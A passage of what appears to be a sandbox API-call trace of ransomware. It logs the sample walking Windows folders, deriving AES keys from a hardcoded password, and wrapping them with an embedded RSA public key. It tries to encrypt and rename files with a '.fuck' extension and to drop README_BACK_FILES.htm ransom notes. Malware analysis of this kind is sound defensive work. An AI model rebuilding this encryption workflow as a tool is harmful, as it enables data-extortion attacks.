Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\readme_back_files.htm")) returned 0xffffffff [0241.000] AreFileApisANSI () returned 1 [0241.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0241.000] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.001] GetLastError () returned 0x5 [0241.001] GetLastError () returned 0x5 [0241.001] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0241.001] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0241.001] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\readme_back_files.htm")) returned 0xffffffff [0241.001] AreFileApisANSI () returned 1 [0241.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0241.001] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.002] GetLastError () returned 0x5 [0241.002] GetLastError () returned 0x5 [0241.002] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0241.002] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0241.002] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28e88b8 [0241.003] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.003] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.003] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0241.003] GetLastError () returned 0x5 [0241.003] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag")) returned 0x20 [0241.004] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", dwFileAttributes=0x80) returned 0 [0241.004] CreateFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.005] CreateFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.005] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.gsg", dwFileAttributes=0x2) returned 0 [0241.005] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x28f6348) returned 1 [0241.008] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0241.008] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.008] CryptHashData (hHash=0x28e84f8, pbData=0x2ec968, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.008] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e84f8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x28e8638) returned 1 [0241.008] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.008] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0241.008] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28f26b8) returned 1 [0241.009] CryptImportPublicKeyInfo (in: hCryptProv=0x28f26b8, dwCertEncodingType=0x1, pInfo=0x2907158*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907188*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907190*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28e7238) returned 1 [0241.009] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0241.009] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f25a8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28f25a8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0241.009] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f25a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0241.009] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0241.009] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0241.009] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0241.009] CloseHandle (hObject=0xffffffff) returned 1 [0241.009] CloseHandle (hObject=0xffffffff) returned 1 [0241.010] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag.gsg"), lpNewFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag"), bFailIfExists=0) returned 0 [0241.010] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", dwFileAttributes=0x0) returned 0 [0241.010] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag.gsg")) returned 0 [0241.011] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag"), lpNewFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.fuck" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag.fuck")) returned 0 [0241.011] CryptDestroyHash (hHash=0x28e84f8) returned 1 [0241.011] CryptDestroyKey (hKey=0x28e8638) returned 1 [0241.011] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.012] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.012] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0241.012] GetLastError () returned 0x5 [0241.012] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag")) returned 0x20 [0241.012] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", dwFileAttributes=0x80) returned 0 [0241.012] CreateFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.013] CreateFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.013] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.gsg", dwFileAttributes=0x2) returned 0 [0241.014] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x28f2630) returned 1 [0241.016] CryptCreateHash (in: hProv=0x28f2630, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0241.016] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.016] CryptHashData (hHash=0x28e84f8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.016] CryptDeriveKey (in: hProv=0x28f2630, Algid=0x6610, hBaseData=0x28e84f8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x28e8638) returned 1 [0241.016] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.016] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0241.016] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28f27c8) returned 1 [0241.017] CryptImportPublicKeyInfo (in: hCryptProv=0x28f27c8, dwCertEncodingType=0x1, pInfo=0x2907b18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907b48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907b50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28e7738) returned 1 [0241.017] CryptEncrypt (in: hKey=0x28e7738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0241.017] CryptEncrypt (in: hKey=0x28e7738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2960*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28f2960*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0241.017] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f2960, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0241.017] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0241.017] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0241.017] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0241.017] CloseHandle (hObject=0xffffffff) returned 1 [0241.018] CloseHandle (hObject=0xffffffff) returned 1 [0241.018] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag.gsg"), lpNewFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag"), bFailIfExists=0) returned 0 [0241.018] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", dwFileAttributes=0x0) returned 0 [0241.018] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag.gsg")) returned 0 [0241.019] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag"), lpNewFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.fuck" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag.fuck")) returned 0 [0241.019] CryptDestroyHash (hHash=0x28e84f8) returned 1 [0241.019] CryptDestroyKey (hKey=0x28e8638) returned 1 [0241.019] CryptReleaseContext (hProv=0x28f2630, dwFlags=0x0) returned 1 [0241.020] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.020] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0241.020] GetLastError () returned 0x5 [0241.020] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag")) returned 0x20 [0241.020] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", dwFileAttributes=0x80) returned 0 [0241.020] CreateFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.021] CreateFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.021] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.gsg", dwFileAttributes=0x2) returned 0 [0241.022] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x28f6348) returned 1 [0241.024] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0241.024] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.024] CryptHashData (hHash=0x28e84f8, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.024] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e84f8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x28e8638) returned 1 [0241.025] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.025] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0241.025] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28f2630) returned 1 [0241.025] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2630, dwCertEncodingType=0x1, pInfo=0x2907088*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29070b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29070c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28e76b8) returned 1 [0241.025] CryptEncrypt (in: hKey=0x28e76b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0241.025] CryptEncrypt (in: hKey=0x28e76b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2af8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28f2af8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0241.025] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f2af8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0241.026] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0241.026] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0241.026] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0241.026] CloseHandle (hObject=0xffffffff) returned 1 [0241.026] CloseHandle (hObject=0xffffffff) returned 1 [0241.026] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag.gsg"), lpNewFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag"), bFailIfExists=0) returned 0 [0241.026] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", dwFileAttributes=0x0) returned 0 [0241.027] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag.gsg")) returned 0 [0241.027] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag"), lpNewFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.fuck" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag.fuck")) returned 0 [0241.028] CryptDestroyHash (hHash=0x28e84f8) returned 1 [0241.028] CryptDestroyKey (hKey=0x28e8638) returned 1 [0241.028] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.028] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.028] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0241.028] GetLastError () returned 0x5 [0241.028] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag")) returned 0x20 [0241.028] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", dwFileAttributes=0x80) returned 0 [0241.029] CreateFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.029] CreateFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.gsg" (normalized: "c:\\users\\all 